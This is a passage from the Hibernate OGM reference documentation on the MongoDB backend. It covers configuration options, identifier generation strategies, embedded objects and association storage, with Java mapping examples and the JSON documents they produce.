MongoDB datastore.\nPossible settings are (values of the `ReadPreferenceType` enum):\n`PRIMARY`, `PRIMARY_PREFERRED`, `SECONDARY`, `SECONDARY_PREFERRED` and `NEAREST`.\nIt's currently not possible to plug in custom read preference types.\nIf you're interested in such a feature, please let us know.\n\nFor more information, please refer to the\nhttp:\/\/api.mongodb.org\/java\/current\/com\/mongodb\/WriteConcern.html[official documentation].\n\n[NOTE]\n====\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou should use the constants accessible via `org.hibernate.ogm.datastore.mongodb.MongoDBProperties`\nwhen specifying the configuration properties listed above.\n\nCommon properties shared between stores are declared on `OgmProperties`\n(a super interface of `MongoDBProperties`).\n\nFor maximum portability between stores, use the most generic interface possible.\n====\n\n[[ogm-mongodb-annotation-configuration]]\n==== Annotation based configuration\n\nHibernate OGM allows to configure store-specific options via Java annotations.\nYou can override global configurations for a specific entity or even a specify property\nby virtue of the location where you place that annotation.\n\nWhen working with the MongoDB backend, you can specify the following settings:\n\n* the write concern for entities and associations using the `@WriteConcern` annotation\n* the read preference for entities and associations using the `@ReadPreference` annotation\n* a strategy for storing associations using the `@AssociationStorage` and `@AssociationDocumentStorage` annotations\n* a strategy for storing the contents of map-typed associations using the `@MapStorage` annotation\n\nRefer to <<mongodb-associations> to learn more about the options related to storing associations.\n\nThe following shows an example:\n\n.Configuring the association storage strategy using annotations\n====\n[source, JAVA]\n----\n@Entity\n@WriteConcern(WriteConcernType.JOURNALED)\n@ReadPreference(ReadPreferenceType.PRIMARY_PREFERRED)\n@AssociationStorage(AssociationStorageType.ASSOCIATION_DOCUMENT)\n@AssociationDocumentStorage(AssociationDocumentStorageType.COLLECTION_PER_ASSOCIATION)\n@MapStorage(MapStorageType.AS_LIST)\npublic class Zoo {\n\n @OneToMany\n private Set<Animal> animals;\n\n @OneToMany\n private Set<Person> employees;\n\n @OneToMany\n @AssociationStorage(AssociationStorageType.IN_ENTITY)\n private Set<Person> visitors;\n\n \/\/ getters, setters ...\n}\n----\n====\n\nThe `@WriteConcern` annotation on the entity level expresses that all writes should be done using the `JOURNALED` setting.\nSimilarly, the `@ReadPreference` annotation advices the engine to preferably read that entity from the primary node if possible.\nThe other two annotations on the type-level specify that all associations of the `Zoo`\nclass should be stored in separate assocation documents, using a dedicated collection per association.\nThis setting applies to the `animals` and `employees` associations.\nOnly the elements of the `visitors` association will be stored in the document of the corresponding `Zoo` entity\nas per the configuration of that specific property which takes precedence over the entity-level configuration.\n\n[[ogm-mongodb-programmatic-configuration]]\n==== Programmatic configuration\n\nIn addition to the annotation mechanism,\nHibernate OGM also provides a programmatic API for applying store-specific configuration options.\nThis can be useful if you can't modify certain entity types or\ndon't want to add store-specific configuration annotations to them.\nThe API allows set options in a type-safe fashion on the global, entity and property levels.\n\nWhen working with MongoDB, you can currently configure the following options using the API:\n\n* write concern\n* read preference\n* association storage strategy\n* association document storage strategy\n* strategy for storing the contents of map-typed associations\n\nTo set these options via the API, you need to create an `OptionConfigurator` implementation\nas shown in the following example:\n\n.Example of an option configurator\n====\n[source, JAVA]\n----\npublic class MyOptionConfigurator extends OptionConfigurator {\n\n @Override\n public void configure(Configurable configurable) {\n configurable.configureOptionsFor( MongoDB.class )\n .writeConcern( WriteConcernType.REPLICA_ACKNOWLEDGED )\n .readPreference( ReadPreferenceType.NEAREST )\n .entity( Zoo.class )\n .associationStorage( AssociationStorageType.ASSOCIATION_DOCUMENT )\n .associationDocumentStorage( AssociationDocumentStorageType.COLLECTION_PER_ASSOCIATION )\n .mapStorage( MapStorageType.ASLIST )\n .property( \"animals\", ElementType.FIELD )\n .associationStorage( AssociationStorageType.IN_ENTITY )\n .entity( Animal.class )\n .writeConcern( new RequiringReplicaCountOf( 3 ) )\n .associationStorage( AssociationStorageType.ASSOCIATION_DOCUMENT );\n }\n}\n----\n====\n\nThe call to `configureOptionsFor()`, passing the store-specific identifier type `MongoDB`,\nprovides the entry point into the API. Following the fluent API pattern, you then can configure\nglobal options (`writeConcern()`, `readPreference()`) and navigate to single entities or properties to apply options\nspecific to these (`associationStorage()` etc.).\nThe call to `writeConcern()` for the `Animal` entity shows how a specific write concern type can be used.\nHere `RequiringReplicaCountOf` is a custom implementation of `WriteConcern` which ensures\nthat writes are propagated to a given number of replicas before a write is acknowledged.\n\nOptions given on the property level precede entity-level options. So e.g. the `animals` association of the `Zoo`\nclass would be stored using the in entity strategy, while all other associations of the `Zoo` entity would\nbe stored using separate association documents.\n\nSimilarly, entity-level options take precedence over options given on the global level.\nGlobal-level options specified via the API complement the settings given via configuration properties.\nIn case a setting is given via a configuration property and the API at the same time,\nthe latter takes precedence.\n\nNote that for a given level (property, entity, global),\nan option set via annotations is overridden by the same option set programmatically.\nThis allows you to change settings in a more flexible way if required.\n\nTo register an option configurator, specify its class name using the `hibernate.ogm.option.configurator` property.\nWhen bootstrapping a session factory or entity manager factory programmatically,\nyou also can pass in an `OptionConfigurator` instance or the class object representing the configurator type.\n\n\n[[ogm-mongodb-storage-principles]]\n=== Storage principles\n\nHibernate OGM tries to make the mapping to the underlying datastore as natural as possible\nso that third party applications not using Hibernate OGM can still read\nand update the same datastore.\nWe worked particularly hard on the MongoDB model\nto offer various classic mappings between your object model\nand the MongoDB documents.\n\nTo describe things simply, each entity is stored as a MongoDB document.\nThis document is stored in a MongoDB collection named after the entity type.\nThe navigational information for each association from one entity to (a set of) entity\nis stored in the document representing the entity we are departing from.\n\n[[mongodb-built-in-types]]\n==== Properties and built-in types\n\nEach entity is represented by a document.\nEach property or more precisely column is represented by a field in this document,\nthe field name being the column name.\n\nHibernate OGM supports by default the following property types:\n\n* `java.lang.String`\n\n[source, JSON]\n----\n { \"text\" : \"Hello world!\" }\n----\n\n* `java.lang.Character` (or char primitive)\n\n[source, JSON]\n----\n { \"delimiter\" : \"\/\" }\n----\n\n* `java.lang.Boolean` (or boolean primitive)\n\n[source, JSON]\n----\n { \"favorite\" : true } # default mapping\n { \"favorite\" : \"T\" } # if @Type(type = \"true_false\") is given\n { \"favorite\" : \"Y\" } # if @Type(type = \"yes_no\") is given\n { \"favorite\" : 1 } # if @Type(type = \"numeric_boolean\") is given\n----\n\n* `java.lang.Byte` (or byte primitive)\n\n[source, JSON]\n----\n { \"display_mask\" : \"70\" }\n----\n\n* `java.lang.Byte[]` (or byte[])\n\n[source, JSON]\n----\n { \"pdfAsBytes\" : BinData(0,\"MTIzNDU=\") }\n----\n\n* `java.lang.Short` (or short primitive)\n\n[source, JSON]\n----\n { \"urlPort\" : 80 }\n----\n\n* `java.lang.Integer` (or integer primitive)\n\n[source, JSON]\n----\n { \"stockCount\" : 12309 }\n----\n\n* `java.lang.Long` (or long primitive)\n\n[source, JSON]\n----\n { \"userId\" : NumberLong(\"-6718902786625749549\") }\n----\n\n* `java.lang.Float` (or float primitive)\n\n[source, JSON]\n----\n { \"visitRatio\" : 10.39 }\n----\n\n* `java.lang.Double` (or double primitive)\n\n[source, JSON]\n----\n { \"tax_percentage\" : 12.34 }\n----\n\n* `java.math.BigDecimal`\n\n[source, JSON]\n----\n { \"site_weight\" : \"21.77\" }\n----\n\n* `java.math.BigInteger`\n\n[source, JSON]\n----\n { \"site_weight\" : \"444\" }\n----\n\n* `java.util.Calendar`\n\n[source, JSON]\n----\n { \"creation\" : \"2014\/11\/03 16:19:49:283 +0000\" }\n----\n\n* `java.util.Date`\n\n[source, JSON]\n----\n { \"last_update\" : ISODate(\"2014-11-03T16:19:49.283Z\") }\n----\n\n* `java.util.UUID`\n\n[source, JSON]\n----\n { \"serialNumber\" : \"71f5713d-69c4-4b62-ad15-aed8ce8d10e0\" }\n----\n\n* `java.util.URL`\n\n[source, JSON]\n----\n { \"url\" : \"http:\/\/www.hibernate.org\/\" }\n----\n\n* `org.bson.types.ObjectId`\n\n[source, JSON]\n----\n { \"object_id\" : ObjectId(\"547d9b40e62048750f25ef77\") }\n----\n\n[NOTE]\n====\nHibernate OGM doesn't store null values in MongoDB,\nsetting a value to null is the same as removing the field\nin the corresponding object in the db.\n\nThis can have consequences when it comes to queries on null value.\n====\n\n==== Entities\n\nEntities are stored as MongoDB documents and not as BLOBs:\neach entity property will be translated into a document field.\nYou can use `@Table` and `@Column` annotations\nto rename respectively the collection the document is stored in\nand the document's field a property is persisted in.\n\n.Default JPA mapping for an entity\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n\/\/ Stored in the Collection \"News\"\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"title\": \"On the merits of NoSQL\",\n}\n----\n====\n\n.Rename field and collection using @Table and @Column\n====\n[source, JAVA]\n----\n@Entity\n\/\/ Overrides the collection name\n@Table(name = \"News_Collection\")\npublic class News {\n\n @Id\n private String id;\n\n \/\/ Overrides the field name\n @Column(name = \"headline\")\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n\/\/ Stored in the Collection \"News\"\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"headline\": \"On the merits of NoSQL\",\n}\n----\n====\n\n===== Identifiers\n\n[NOTE]\n====\nHibernate OGM always store identifiers using the `_id` field of a MongoDB document ignoring\nthe name of the property in the entity.\n\nThat's a good thing as MongoDB has special treatment and expectation of the property `_id`.\n====\n\nAn identifier type may be one of the <<mongodb-built-in-types,built-in types>>\nor a more complex type represented by an embedded class.\nWhen you use a built-in type, the identifier is mapped like a regular property.\nWhen you use an embedded class, then the `_id` is representing a nested document\ncontaining the embedded class properties.\n\n.Define an identifier as a primitive type\n====\n[source, JAVA]\n----\n@Entity\npublic class Bookmark {\n\n @Id\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"bookmark_1\"\n \"title\" : \"Hibernate OGM documentation\"\n}\n----\n====\n\n.Define an identifier using @EmbeddedId\n====\n[source, JAVA]\n----\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n private String content;\n\n \/\/ getters, setters ...\n}\n----\n\nNews collection as JSON in MongoDB\n\n[source, JSON]\n----\n\n{\n \"_id\" : {\n \"author\" : \"Guillaume\",\n \"title\" : \"How to use Hibernate OGM ?\"\n },\n \"content\" : \"Simple, just like ORM but with a NoSQL database\"\n}\n\n----\n====\n\nGenerally, it is recommended though to work with MongoDB's object id data type.\nThis will facilitate the integration with other applications expecting that common MongoDB id type.\nTo do so, you have two options:\n\n* Define your id property as `org.bson.types.ObjectId`\n* Define your id property as `String` and annotate it with `@Type(type=\"objectid\")`\n\nIn both cases the id will be stored as native `ObjectId` in the datastore.\n\n.Define an id as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private ObjectId id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n.Define an id of type String as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @Type(type = \"objectid\")\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n====\n\n===== Identifier generation strategies\n\nYou can assign id values yourself or let Hibernate OGM generate the value using the\n`@GeneratedValue` annotation.\n\nThere are 4 different strategies:\n\n1. <<mongodb-identity-id-generation-strategy, IDENTITY>> (suggested)\n2. <<mongodb-table-id-generation-strategy, TABLE>>\n3. <<mongodb-sequence-id-generation-strategy, SEQUENCE>>\n4. <<mongodb-auto-id-generation-strategy, AUTO>>\n\n[[mongodb-identity-id-generation-strategy]]\n*1) IDENTITY generation strategy*\n\nThe preferable strategy, Hibernate OGM will create the identifier upon insertion.\nTo apply this strategy the id must be one of the following:\n\n* annotated with `@Type(type=\"objectid\")`\n* `org.bson.types.ObjectId`\n\nlike in the following examples:\n\n.Define an id of type String as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @GeneratedValue(strategy = GenerationType.IDENTITY)\n @Type(type = \"objectid\")\n private String id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : ObjectId(\"5425448830048b67064d40b1\"),\n \"title\" : \"Exciting News\"\n}\n----\n====\n\n.Define an id as ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n @GeneratedValue(strategy = GenerationType.IDENTITY)\n private ObjectId id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : ObjectId(\"5425448830048b67064d40b1\"),\n \"title\" : \"Exciting News\"\n}\n----\n====\n\n[[mongodb-table-id-generation-strategy]]\n*2) TABLE generation strategy*\n\n.Id generation strategy TABLE using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE)\n private Long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n\n----\n\nGuitarPlayer collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"name\" : \"Buck Cherry\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"GuitarPlayer\",\n \"next_val\" : 101\n}\n----\n====\n\n.Id generation strategy TABLE using a custom table\n====\n[source, JAVA]\n----\n@Entity\npublic class GuitarPlayer {\n\n @Id\n @GeneratedValue(strategy = GenerationType.TABLE, generator = \"guitarGen\")\n @TableGenerator(\n name = \"guitarGen\",\n table = \"GuitarPlayerSequence\",\n pkColumnValue = \"guitarPlayer\",\n valueColumnName = \"nextGuitarPlayerId\"\n )\n private long id;\n\n \/\/ getters, setters ...\n}\n\n----\n\nGuitarPlayer collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(1),\n \"name\" : \"Buck Cherry\"\n}\n----\n\nGuitarPlayerSequence collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"guitarPlayer\",\n \"nextGuitarPlayerId\" : 2\n}\n----\n====\n\n*3) SEQUENCE generation strategy*\n\n[[mongodb-sequence-id-generation-strategy]]\n.SEQUENCE id generation strategy using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE)\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\nSong collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(2),\n \"title\" : \"Flower Duet\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"song_sequence_name\", \"next_val\" : 21 }\n----\n====\n\n[[mongodb-sequence-id-generation-strategy-custom]]\n.SEQUENCE id generation strategy using custom values\n====\n[source, JAVA]\n----\n@Entity\npublic class Song {\n\n @Id\n @GeneratedValue(strategy = GenerationType.SEQUENCE, generator = \"songSequenceGenerator\")\n @SequenceGenerator(\n name = \"songSequenceGenerator\",\n sequenceName = \"song_seq\",\n initialValue = 2,\n allocationSize = 20\n )\n private Long id;\n\n private String title;\n\n \/\/ getters, setters ...\n}\n----\n\nSong collection\n\n[source, JSON]\n----\n{\n \"_id\" : NumberLong(2),\n \"title\" : \"Flower Duet\"\n}\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"song_seq\", \"next_val\" : 42 }\n----\n====\n\n[[mongodb-auto-id-generation-strategy]]\n*4) AUTO generation strategy*\n\n[WARNING]\n====\nCare must be taken when using the `GenerationType.AUTO` strategy.\nWhen the property `hibernate.id.new_generator_mappings` is set to `false` (default),\nit will map to the `IDENTITY` strategy.\nAs described before, this requires your ids to be of type `ObjectId` or `@Type(type = \"objectid\") String`.\nIf `hibernate.id.new_generator_mappings` is set to true, `AUTO` will be mapped to the `TABLE` strategy.\nThis requires your id to be of a numeric type.\n\nWe recommend to not use `AUTO` but one of the explicit strategies (`IDENTITY` or `TABLE`) to avoid\npotential misconfigurations.\n\nFor more details you can check the issue https:\/\/hibernate.atlassian.net\/browse\/OGM-663[OGM-663].\n====\n\nIf the property `hibernate.id.new_generator_mappings` is set to `false`,\n`AUTO` will behave as the `IDENTITY` strategy.\n\nIf the property `hibernate.id.new_generator_mappings` is set to `true`,\n`AUTO` will behave as the `SEQUENCE` strategy.\n\n.AUTO id generation strategy using default values\n====\n[source, JAVA]\n----\n@Entity\npublic class DistributedRevisionControl {\n\n @Id\n @GeneratedValue(strategy = GenerationType.AUTO)\n private Long id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\nDistributedRevisionControl collection\n\n[source, JSON]\n----\n{ \"_id\" : NumberLong(1), \"name\" : \"Git\" }\n----\n\nhibernate_sequences collection\n\n[source, JSON]\n----\n{ \"_id\" : \"hibernate_sequence\", \"next_val\" : 2 }\n----\n====\n\n.AUTO id generation strategy wih `hibernate.id.new_generator_mappings` set to false and ObjectId\n====\n[source, JAVA]\n----\n@Entity\npublic class Comedian {\n\n @Id\n @GeneratedValue(strategy = GenerationType.AUTO)\n private ObjectId id;\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\nComedian collection\n\n[source, JSON]\n----\n{ \"_id\" : ObjectId(\"5458b11693f4add0f90519c5\"), \"name\" : \"Louis C.K.\" }\n----\n====\n\n.Entity with @EmbeddedId\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @EmbeddedId\n private NewsID newsId;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsID implements Serializable {\n\n private String title;\n private String author;\n\n \/\/ getters, setters ...\n}\n----\n\nRendered as JSON in MongoDB\n[source, JSON]\n----\n{\n \"_id\" :{\n \"title\": \"How does Hibernate OGM MongoDB work?\",\n \"author\": \"Guillaume\"\n }\n}\n----\n====\n\n===== Embedded objects and collections\n\nHibernate OGM stores elements annotated with `@Embedded` or `@ElementCollection` as nested documents of the owning entity.\n\n.Embedded object\n====\n[source, JAVA]\n----\n@Entity\npublic class News {\n\n @Id\n private String id;\n private String title;\n\n @Embedded\n private NewsPaper paper;\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class NewsPaper {\n\n private String name;\n private String owner;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"1234-5678-0123-4567\",\n \"title\": \"On the merits of NoSQL\",\n \"paper\": {\n \"name\": \"NoSQL journal of prophecies\",\n \"owner\": \"Delphy\"\n }\n}\n----\n====\n\n.@ElementCollection with primitive types\n====\n[source, JAVA]\n----\n@Entity\npublic class AccountWithPhone {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<String> mobileNumbers;\n\n \/\/ getters, setters ...\n}\n----\n\nAccountWithPhone collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"john_account\",\n \"mobileNumbers\" : [ \"+1-222-555-0222\", \"+1-202-555-0333\" ]\n}\n----\n====\n\n.@ElementCollection with one attribute\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"df153180-c6b3-4a4c-a7da-d5de47cf6f00\",\n \"grandChildren\" : [ \"Luke\", \"Leia\" ]\n}\n----\n====\n\nThe class `GrandChild` has only one attribute `name`,\nthis means that Hibernate OGM doesn't need to store the name of the attribute.\n\nIf the nested document has two or more fields, like in the following example,\nHibernate OGM will store the name of the fields as well.\n\n.@ElementCollection with @OrderColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class GrandMother {\n\n @Id\n private String id;\n\n @ElementCollection\n @OrderColumn( name = \"birth_order\" )\n private List<GrandChild> grandChildren = new ArrayList<GrandChild>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class GrandChild {\n\n private String name;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"e3e1ed4e-c685-4c3f-9a67-a5aeec6ff3ba\",\n \"grandChildren\" :\n [\n {\n \"name\" : \"Luke\",\n \"birth_order\" : 0\n },\n {\n \"name\" : \"Leia\",\n \"birthorder\" : 1\n }\n ]\n}\n----\n====\n\n.@ElementCollection with Map of @Embeddable\n====\n[source, JAVA]\n----\n@Entity\npublic class ForumUser {\n\n\t@Id\n\tprivate String name;\n\n\t@ElementCollection\n\tprivate Map<String, JiraIssue> issues = new HashMap<>();\n\n \/\/ getters, setters ...\n}\n\n@Embeddable\npublic class JiraIssue {\n\n\tprivate Integer number;\n\tprivate String project;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"Jane Doe\",\n \"issues\" : {\n \"issueWithNull\" : {\n },\n \"issue2\" : {\n \"number\" : 2000,\n \"project\" : \"OGM\"\n },\n \"issue1\" : {\n \"number\" : 1253,\n \"project\" : \"HSEARCH\"\n }\n }\n}\n----\n====\n\n[NOTE]\n====\nYou can override the column name used for a property of an embedded object.\nBut you need to know that the default column name is the concatenation of the embedding property,\na `.` (dot) and the embedded property (recursively for several levels of embedded objects).\n\nThe MongoDB datastore treats dots specifically as it transforms them into nested documents.\nIf you want to override one column name and still keep the nested structure, don't forget the dots.\n\nThat's a bit abstract, so let's use an example.\n\n[source, JAVA]\n----\n@Entity\nclass Order {\n @Id String number;\n User user;\n Address shipping;\n @AttributeOverrides({\n @AttributeOverride(name=\"name\", column=@Column(name=\"delivery.provider\"),\n @AttributeOverride(name=\"expectedDelaysInDays\", column=@Column(name=\"delivery.delays\")\n })\n DeliveryProvider deliveryProvider;\n CreditCardType cardType;\n}\n\n\/\/ default columns\n@Embedded\nclass User {\n String firstname;\n String lastname;\n}\n\n\/\/ override one column\n@Embeddable\npublic Address {\n String street;\n @Column(name=\"shipping.dest_city\")\n String city;\n}\n\n\/\/ both columns overridden from the embedding side\n@Embeddable\npublic DeliveryProvider {\n String name;\n Integer expectedDelaysInDays;\n}\n\n\/\/ do not use dots in the overriding\n\/\/ and mix levels (bad form)\n@Embedded\nclass CreditCardType {\n String merchant;\n @Column(name=\"network\")\n String network;\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\": \"123RF33\",\n \"user\": {\n \"firstname\": \"Emmanuel\",\n \"lastname\": \"Bernard\"\n },\n \"shipping\": {\n \"street\": \"1 av des Champs Elys\u00e9es\",\n \"dest_city\": \"Paris\"\n },\n \"delivery\": {\n \"provider\": \"Santa Claus Inc.\",\n \"delays\": \"1\"\n }\n \"network\": \"VISA\",\n \"cardType: {\n \"merchant\": \"Amazon\"\n }\n}\n----\n\nIf you share the same embeddable in different places, you can use JPA's `@AttributeOverride`\nto override columns from the embedding side.\nThis is the case of `DeliveryProvider` in our example.\n\nIf you omit the dot in one of the columns, this column will not be part of the nested document.\nThis is demonstrated by the `CreditCardType`.\nWe advise you against it.\nLike crossing streams, it is bad form.\nThis approach might not be supported in the future.\n====\n\n[[mongodb-associations]]\n==== Associations\n\nHibernate OGM MongoDB proposes three strategies to store navigation information for associations.\nThe three possible strategies are:\n\n* <<mongodb-in-entity-strategy, IN_ENTITY>> (default)\n* <<mongodb-association-document-strategy, ASSOCIATION_DOCUMENT>>, using a global collection for all associations\n* <<mongodb-collection-per-association-strategy, COLLECTION_PER_ASSOCIATION>>, using a dedicated collection for each association\n\nTo switch between these strategies, use of the three approaches to options:\n\n* annotate your entity with `@AssocationStorage` and `@AssociationDocumentStorage` annotations (see <<ogm-mongodb-annotation-configuration>>),\n* use the API for programmatic configuration (see <<ogm-mongodb-programmatic-configuration>>)\n* or specify a default strategy via the `hibernate.ogm.datastore.document.association_storage` and\n`hibernate.ogm.mongodb.association_document_storage` configuration properties.\n\n[[mongodb-in-entity-strategy]]\n===== In Entity strategy\n\n* <<mongodb-in-entity-to-one-associations, *-to-one associations>>\n* <<mongodb-in-entity-to-many-associations, *-to-many associations>>\n\nIn this strategy, Hibernate OGM stores the id(s) of the associated entity(ies)\ninto the entity document itself.\nThis field stores the id value for to-one associations and an array of id values for to-many associations.\nAn embedded id will be represented by a nested document.\nFor indexed collections (i.e. `List` or `Map`), the index will be stored along the id.\n\n[NOTE]\n====\nWhen using this strategy the annotations `@JoinTable` will be ignored because no collection is created\nfor associations.\n\nYou can use `@JoinColumn` to change the name of the field that stores the foreign key (as an example, see\n<<mongodb-in-entity-one-to-one-join-column>>).\n====\n\n[[mongodb-in-entity-to-one-associations]]\n===== To-one associations\n\n.Unidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"W001\",\n \"diameter\" : 0,\n \"vehicle_id\" : \"V_01\"\n}\n----\n====\n\n[[mongodb-in-entity-one-to-one-join-column]]\n.Unidirectional one-to-one with @JoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @JoinColumn( name = \"part_of\" )\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"W001\",\n \"diameter\" : 0,\n \"part_of\" : \"V_01\"\n}\n----\n====\n\nIn a true one-to-one association, it is possible to share the same id between the two entities\nand therefore a foreign key is not required. You can see how to map this type of association in\nthe following example:\n\n.Unidirectional one-to-one with @MapsId and @PrimaryKeyJoinColumn\n====\n[source, JAVA]\n----\n@Entity\npublic class Vehicle {\n\n @Id\n private String id;\n private String brand;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wheel {\n\n @Id\n private String id;\n private double diameter;\n\n @OneToOne\n @PrimaryKeyJoinColumn\n @MapsId\n private Vehicle vehicle;\n\n \/\/ getters, setters ...\n}\n----\n\nVehicle collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"brand\" : \"Mercedes\"\n}\n----\n\nWheel collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"V_01\",\n \"diameter\" : 0,\n}\n----\n====\n\n.Bidirectional one-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class Husband {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Wife wife;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Wife {\n\n @Id\n private String id;\n private String name;\n\n @OneToOne\n private Husband husband;\n\n \/\/ getters, setters ...\n}\n----\n\nHusband collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"alex\",\n \"name\" : \"Alex\",\n \"wife\" : \"bea\"\n}\n----\n\nWife collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"bea\",\n \"name\" : \"Bea\",\n \"husband\" : \"alex\"\n}\n----\n====\n\n.Unidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class JavaUserGroup {\n\n @Id\n private String jugId;\n private String name;\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class Member {\n\n @Id\n private String id;\n private String name;\n\n @ManyToOne\n private JavaUserGroup memberOf;\n\n \/\/ getters, setters ...\n}\n----\n\nJavaUserGroup collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"summer_camp\",\n \"name\" : \"JUG Summer Camp\"\n}\n----\n\nMember collection as JSON in MongoDB\n\n[source, JSON]\n----\n{\n \"_id\" : \"jerome\",\n \"name\" : \"Jerome\"\n \"memberOf_jugId\" : \"summer_camp\"\n}\n{\n \"_id\" : \"emmanuel\",\n \"name\" : \"Emmanuel Bernard\"\n \"memberOf_jugId\" : \"summer_camp\"\n}\n----\n====\n\n.Bidirectional many-to-one\n====\n[source, JAVA]\n----\n@Entity\npublic class SalesForce {\n\n @Id\n private String id;\n private String corporation;\n\n @OneToMany(mappedBy = \"salesForce\")\n private Set<SalesGuy> salesGuys = new HashSet<SalesGuy>();\n\n \/\/ getters, setters ...\n}\n\n@Entity\npublic class SalesGuy {\n private String id;\n private String name;\n\n @ManyToOne\n private SalesForce salesForce;\n\n \/\/ getters, setters ...\n}\n----\n\nSalesForce collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"red_hat\",\n \"corporation\" : \"Red Hat\",\n \"salesGuys\" : [ \"eric\", \"simon\" ]\n}\n----\n\nSalesGuy collection\n\n[source, JSON]\n----\n{\n \"_id\" : \"eric\",\n \"name\" : \"Eric\"\n \"salesForce_id\" : \"red_hat\",\n}\n{\n \"_id\" : \"simon\",\n \"name\" : \"Simon\",\n \"salesForce_id\" : \"red_hat\"\n}\n----\n====\n\n.Bidirectional many-to-one between entities with embedded ids\n====\n[source, JAVA]\n----\n@Entity\npublic class Game {\n\n @EmbeddedId\n private GameId id;\n\n private String name;\n\n @ManyToOne\n private Court playedOn;\n\n \/\/ getters, setters ...\n}\n\n\npublic class GameId implements Serializable {\n\n private String category;\n\n @Column(name = \"id.gameSequenceNo\")\n private int sequenceNo;\n\n \/\/ getters, setters ...\n \/\/ equals \/ hashCode\n}\n\n@Entity\npublic class Court {\n\n 